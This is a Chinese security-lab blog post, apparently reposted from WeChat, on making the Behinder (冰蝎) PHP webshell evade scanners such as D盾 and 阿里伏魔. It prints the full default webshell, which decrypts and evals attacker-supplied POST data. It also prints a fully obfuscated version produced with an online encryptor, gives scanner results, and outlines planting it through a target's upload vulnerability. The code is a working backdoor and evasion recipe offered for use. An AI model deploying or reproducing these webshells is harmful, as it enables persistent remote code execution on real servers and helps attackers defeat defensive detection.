网安引领时代,弥天点亮未来
随着网络攻防对抗的愈演愈烈,”查杀“与“免杀”作为对抗最基本的场景。同时webshell作为攻击者突破网络边界的关键武器,不论是攻击者的绕过检测还防守者的检测都已经成为兵家必争之器。
以下是冰蝎默认php环境下的webshell文件
@error_reporting(0);session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15];}}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
通过webshell 查杀工具进行检测,结果如下:
D盾检测(可检测)
冰河检测(可检测)
阿里伏魔(可检测)
免杀处理
通过使用常见的方式进行免杀处理,一般对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是可以的。
下面通过对php马进行混淆参数、加密等方式进行免杀处理。
https://enphp.djunny.com/
1.将冰蝎默认的webshell上传到平台。
2.选择混淆的参数,这里全选
3.点击加密,生成免杀后的webshell(每次生成都不一样,有时会解析出问题)
接下来进行免杀测试
D盾检测(可疑)
冰河检测(免杀)
阿里伏魔检测(风险)
这里是免杀马内容,感觉乱七八糟的
/*yunzui*/goto ½ÎÃÏ;¨êãâ:function ˆšî(){goto Ö“Âý;íÒÈÛ:return((parse_str("®íñš=Y2FsbF91c2VyX2Z1bmM",$õþõ±)||$õþõ±)?base64_decode($õþõ±['®íñš']):"");goto ñæ¦ì;ñæ¦ì:±íúÂ:goto ô«—˜;ó®æ¢:$Š³ñ‘=0x00026a9;goto ŠÓ’õ;ŠÓ’õ:if(!($„“ý[0]==$Š³ñ‘+0x0024))goto ±íúÂ;goto íÒÈÛ;Ö“Âý:$„“ý=func_get_args();goto ó®æ¢;ô«—˜:}goto ßÑ;Ͳ”°:goto ÔŸ¶õ;goto ÅØ»ô;»Œ¶Ô:class C{public function __invoke($´€¼À){eval($´€¼À.base64_decode(str_rot13('')));}}goto ¹Ôœ·;ž–™:ÔŸ¶õ:goto °ËüÉ;ÅØ»ô:ݲ÷:goto ™µý¼;Û®ˆ:$Ö€Ï=˜ò(0x000d95,0x00da8,0x0000d73)(˜ò(0x00df3,0x00000dce));goto ¶Á ;˺Úë:$ð謃=˜ò(0x00d08,$ð謃);goto û»‰;¡ÐÈ—:$Ö€Ï=$‰óÔ($Ö€Ï.((parse_str("–õ¿×=",$¥¨ýÊ)||$¥¨ýÊ)?base64_decode($¥¨ýÊ['–õ¿×']):""));goto ³òäÝ;™µý¼:ûãýË:goto 擇;ßÑ:function ÃŒûƒ(){goto Òé¿€;ÁŒíÇ:return((parse_str("c3RybGVu",$Ãò²¶)||$Ãò²¶)?base64_decode(key($Ãò²¶)):"");goto ãáÚ;÷㵸:ÍØËÎ:goto Ýžº¤;‘´¿Â:if(!($¯‡¬Æ[0x0002]==$©¢Ì+0x00061))goto µž×ì;goto á;ÆÙâã:$©¢Ì=0x0240e;goto ÖÚï½;ðÁ¯¬:µž×ì:goto ¯ÎÒ×;á:return(base64_decode('b3BlbnNzbF9kZWNyeXB0')?:$טգ);goto ðÁ¯¬;¬¹•Ž:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x000013e))goto ßîÛñ;goto ——¹™;ÁÁÓì:return((parse_str("‡¡Ž=ZXhwbG9kZQ",$ÑÛÚû)||$ÑÛÚû)?base64_decode($ÑÛÚû['‡¡Ž']):"");goto ’²óŒ;ÖÚï½:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x02d))goto Á㤈;goto ÁŒíÇ;øôÜÎ:return base64_decode(str_rot13('DHIGZGV4'));goto ÷㵸;——¹™:return "x7c";goto ÍÌ–ƒ;ãáÚ:Á㤈:goto ‘´¿Â;¯ÎÒ×:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x0000b7))goto ÍØËÎ;goto øôÜÎ;’²óŒ:¿Ïˆ:goto ¬¹•Ž;Òé¿€:$¯‡¬Æ=func_get_args();goto ÆÙâã;ÍÌ–ƒ:ßîÛñ:goto ݈·¦;Ýžº¤:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x00000f9))goto ¿Ïˆ;goto ÁÁÓì;݈·¦:}goto ‹âãÄ;Ûžªö:@˜ò(0x000cf5)(0);goto Ñ˘;±ëéˆ:$¾¶è¼=$Œåò„[0];goto Üí©;°ËüÉ:if(!($›•Å•<ÃŒûƒ(0x002450,0x0243b)($Ö€Ï)))goto ݲ÷;goto çÈŸÞ;çÈŸÞ:$Ö€Ï[$›•Å•]=$Ö€Ï[$›•Å•]^$ð謃[$›•Å•+0x001&0x0f];goto ©è³±;´©ú§:¸Õï:goto ·¸¶†;ÁÜÁ·:$›•Å•++;goto Ͳ”°;‹âãÄ:function ûú¥ó(){goto ȵ¢ý;ÊѼÁ:return gzinflate('K(IÍ+ÎÌÏ‹ÏÉOLIM�');goto õÕ·å;ô Ù:return base64_decode(join("",array('Y','m','F','z','Z','T','Y','0','X','w')));goto õ¯¶›;¦¬û:if(!($äˆýÆ[0]==$¤üì˜+0x037))goto ï’è;goto æÝ”;ÖÝŠÂ:$¤üì˜=0x00000e00;goto ¤—ïÁ;õÕ·å:îߤ”:goto ¦¬û;õ¯¶›:œ¬‹Ï:goto ½ô¥;¶ŸÁ¹:—䧆:goto ú¨ï«;ȵ¢ý:$äˆýÆ=func_get_args();goto ÖÝŠÂ; ½ô¥:if(!($äˆýÆ[0]==$¤üì˜+0x000006d))goto —䧆;goto 둨ˆ;æÝ”:return gzinflate('Ë/HÍ+.Î�');goto ‚ ™œ;¤—ïÁ:if(!($äˆýÆ[0]==$¤üì˜+0x0015))goto îߤ”;goto ÊѼÁ;»ïÊÃ:if(!($äˆýÆ[0]==$¤üì˜+0x004c))goto œ¬‹Ï;goto ô Ù;‚ ™œ: ï’è:goto »ïÊÃ;둨ˆ:return base64_decode(join("",array('Z','G','V','j','b','2','R','l')));goto ¶ŸÁ¹;ú¨ï«:}goto „è›Ø;„„éŽ:˜ò(0x00000d51)();goto Û®ˆ;„è›Ø:function ˜ò(){goto µ¾ýö;µ¢Ü·:return base64_decode('ZTQ1ZTMyOWZlYjVkOTI1Yg');goto Š„Ä ;ßµ–Ì:Šõ‡ö:goto ™ŠÂ²;ÎÀ°Ä:return(($½šÒ·=gzinflate(substr(base64_decode('H4sIAAAAAAAAA0stKsovii9KLcgvKsnMSwcAF20hmA8AAAA'),10,-8)))?$½šÒ·:$ØÒš);goto î°¥¬;¾œóœ:if(!($½“â[0x001]==$”ݸ‚+0x000049))goto ™ý¥î;goto ¾Ú˜Ô;”ÁÄ©:if(!($½“â[0x001]==$”ݸ‚+0x00100))goto ©ÂÛý;goto ‰É£Ä;âŽÕ×:if(!($½“â[0]==$”ݸ‚+0x00003a))goto ÚÈ¥ƒ;goto µ¢Ü·;妥Þ:if(!($½“â[0]==$”ݸ‚+0x0000027))goto ëß©Þ;goto ÎÀ°Ä;µ¾ýö:$”ݸ‚=0x0000cce;goto µúÓ;µúÓ:$½“â=func_get_args();goto 妥Þ;‰É£Ä:return(($«º“¥=gzinflate(substr(base64_decode('H4sIAAAAAAAAAyvIKLDS18/MKygtAQCnED5iCwAAAA'),10,-8)))?$«º“¥:$Èßú);goto 陿;¢ìµ®:if(!($½“â[0]==$”ݸ‚+0x0083))goto Šõ‡ö;goto ª»Š¤;¾Ú˜Ô:return(($“‘Ûã=gzinflate(substr(base64_decode('H4sIAAAAAAAAA8sGAF1XYggBAAAA'),10,-8)))?$“‘Ûã:$ÂüœÇ);goto æÀØ€;陿:©ÂÛý:goto €–¾ô;Ø€ø:return base64_decode(join("",array('Z','m','l','s','Z','V','9','n','Z','X','R','f','Y','2','9','u','d','G','V','u','d','H','M')));goto Íœ–Ä;æÀØ€:™ý¥î:goto ¢ìµ®;Š„Ä :ÚÈ¥ƒ:goto ¾œóœ;ª»Š¤:return((parse_str("c2Vzc2lvbl93cml0ZV9jbG9zZQ",$¥’‚É)||$¥’‚É)?base64_decode(key($¥’‚É)):"");goto ßµ–Ì;™ŠÂ²:if(!($½“â[0x0002]==$”ݸ‚+0x0a5))goto ϹàÆ;goto Ø€ø;î°¥¬:ëß©Þ:goto âŽÕ×;Íœ–Ä:ϹàÆ:goto ”ÁÄ©;€–¾ô:}goto Ûžªö;½ÎÃÏ:error_reporting(0);goto ¨êãâ;·¸¶†:$‰óÔ=ûú¥ó(0x0e4c).ûú¥ó(0x0000e6d);goto ¡ÐÈ—;擇:$Œåò„=ÃŒûƒ(0x00000252f,0x000002507)(ÃŒûƒ(0x000257d,0x0000254c),$Ö€Ï);goto ±ëéˆ;ÉöèØ:goto ûãýË;goto ´©ú§;Üí©:$·ø¬Ý=$Œåò„[0x001];goto »Œ¶Ô;Ñ˘:session_start();goto ˺Úë;û»‰:$_SESSION[˜ò(0x00d21,0x00d17)]=$ð謃;goto „„éŽ;³òäÝ:$›•Å•=0;goto ž–™;¶Á :if(!ûú¥ó(0x0e15)(ûú¥ó(0x00000e37)))goto ¸Õï;goto ´ŸÍš;´ŸÍš:$Ö€Ï=ÃŒûƒ(0x00249b,0x0024b4,0x000246f)($Ö€Ï,ÃŒûƒ(0x00024f6,0x000024c5),$ð謃);goto ÉöèØ;©è³±:êÓ›à:goto ÁÜÁ·;¹Ôœ·:@ˆšî(0x000026cd)(new C(),$·ø¬Ý);
利用上传漏洞进行实战
1.通过信息收集发现目标存在漏洞,上传免杀wesbell并进行解析
2.冰蝎连接(可魔改)
连接成功
通常基于特征的webshell查杀,如果一旦经过加密webshell是不具备任何特征的,基本上是直接通杀。一般来,免杀工具及免杀程序的开发者最好还是不要公开,不然被检测是很简单的事情。就像0day漏洞一样(未知威胁),如果成为1day就马上可以检测了。(已知威胁)最后,大家思考下面一个问题:
攻击者防守者是什么关系呢?
然后,我们复习一下生物知识
生物与生物之间的关系有原始合作、共栖关系、寄生关系、共生关系、捕食关系和竞争关系。
1、原始合作:指两种生物共居在一起,对双方都有一定程度的利益,但彼此分开后,各自又都能够独立生活。
2、共栖关系:指两种共居,一方受益,另一方也无害或无大害。
3、寄生关系:指一种生物生活在另一种生物的体内或体表,并从后者摄取营养以维持生活的关系。前者称寄生物,后者称宿主。
4、共生关系:共生有广义的和狭义的两种概念。狭义的是指两种共居一起,彼此创造有利的生活条件,较之单独生活时更为有利,更有生活力;相互依赖,相互依存,一旦分离,双方都不能正常地生活。
5、捕食关系:指一种生物以另一种生物为食的种间关系。前者谓之捕食者,后者谓被捕食者。
6、竞争关系:有种内和种间两种竞争方式。这里是指两种共居一起,为争夺有限的营养、空间和其他共同需要而发生斗争的种间关系。
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):冰蝎Webshell的免杀实战(一)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论